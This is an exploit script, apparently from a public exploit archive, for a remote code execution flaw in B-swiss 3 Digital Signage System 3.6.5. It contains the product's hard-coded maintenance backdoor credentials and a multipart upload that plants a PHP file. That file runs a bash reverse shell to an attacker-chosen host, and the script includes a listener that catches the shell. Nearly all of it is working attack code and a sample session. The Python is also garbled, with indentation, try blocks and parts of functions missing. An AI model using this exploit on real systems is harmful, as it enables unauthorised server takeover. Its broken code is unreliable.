# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
# 3.6.2
# 3.6.1
# 3.6.0
# 3.5.80
# 3.5.40
# 3.5.20
# 3.5.00
# 3.2.00
# 3.1.00
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
# Tested on: Linux 5.3.0-46-generic x86_64
#Linux 4.15.0-20-generic x86_64
#Linux 4.9.78-xxxx-std-ipv6-64
#Linux 4.7.0-040700-generic x86_64
#Linux 4.2.0-27-generic x86_64
#Linux 3.19.0-47-generic x86_64
#Linux 2.6.32-5-amd64 x86_64
#Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
#macOS 10.13.5
#Microsoft Windows 7 Business Edition SP1 i586
#Apache/2.4.29 (Ubuntu)
#Apache/2.4.18 (Ubuntu)
#Apache/2.4.7 (Ubuntu)
#Apache/2.2.22 (Win64)
#Apache/2.4.18 (Ubuntu)
#Apache/2.2.16 (Debian)
#WampServer 3.2.0
#Acore Framework 2.0
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
# 13.06.2020
from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep#|01 | 04|#peels trompi emit morf
import urllib.request# | ||| #tseuqer.billru tropmi
import urllib.parse# | ||| #esrap.billru tropmi
import telnetlib#| | |#biltenlet tropmi
import threading#||| |#gnidaerht tropmi
import requests# ||| | #stseuqer tropmi
import socket# | |o| #tekcos tropmi
import sys,re# | | | #er,sys tropmi
############## #-----------------+-----------------# ##############
############### oOo ###############
################ | ################
#################### Y ####################
############################ _ ############################
class Sign:
def __init__(self):
self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
self.password = b"\x44\x50\x36\x25\x57\x33\x64"
self.agent = "SignageBot/1.02"
self.fileid = "251"
self.payload = None
self.answer = False
self.params = None
self.rhost = None
self.lhost = None
self.lport = None
self.send = None
def env(self):
if len(sys.argv) != 4:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)
def usage(self):
print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
print("Example: python3 {} 7777\n".format(sys.argv[0]))
def roger(self):
waddup = """
!B-swiss 3 !
! RCE!
L_ !
/ _)!
/ /__L
____________/ (____)
def test(self):
print("[*] Checking target...")
r = requests.get(self.rhost)
response = r.text
if not "B-swiss" in response:
print("[!] Not a b-swiss system")
if "B-swiss" in response:
print("[*] Good to go!")
except Exception as e:
print("[!] Ney ney: {msg}".format(msg=e))
def login(self):
token = ""
cj = CookieJar()
self.params = {"locator": "visitor.ProcessLogin",
"username" : self.username,
"password" : self.password,
"x": "0",
"y": "0"}
damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
damato.addheaders.append(("User-Agent", self.agent))
print("[*] Getting backdoor session...")
damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
for cookie in cj:
token = cookie.value
print("[*] Got master backdoor cookie: "+token)
except urllib.request.URLError as e:
print("[!] Connection error: {}".format(e.reason))
return token
def upload(self):
j = "\r\n"
self.cookies = {"PNU_RAD_LIB" : self.rtoken}
self.headers = {"Cache-Control" : "max-age=0",
"Content-Type": "multipart/form-data; boundary=----j",
"User-Agent": self.agent,
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9",
"Connection": "close"}
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"
print("[*] Adding GUI credentials: test:123456")
# rec_adminlevel values:
# ----------------------
# 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
#7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
#8 - Other |
self.send= "------j{}Content-Disposition: form-data; ".format(j)#|
self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#|
self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# |
self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#|
self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#|
self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#|
self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)#|
self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#|
self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#|
self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
print("[*] Executing and deleting stager file")
r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
if self.answer[0] == "y" or self.answer[0] == "Y":
print("[*] Removing...")
requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
if self.answer[0] == "n" or self.answer[0] == "N":
print("[*] Cool!")
print("[*] t00t!")
def razmisluju(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.phone)
def fish(self):
r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
response = r.text
print("[*] Checking for previous attempts...")
if not ".php" in response:
print("[*] All good.")
elif "251.php" in response:
print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))
def phone(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", self.lport))
while True:
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] No outgoing calls :( ({msg})".format(msg=p))
print("[+] Check your port mappings or increase timeout")
print("[*] You got shell!")
def main(self):
self.rtoken = self.login()
if __name__ == '__main__':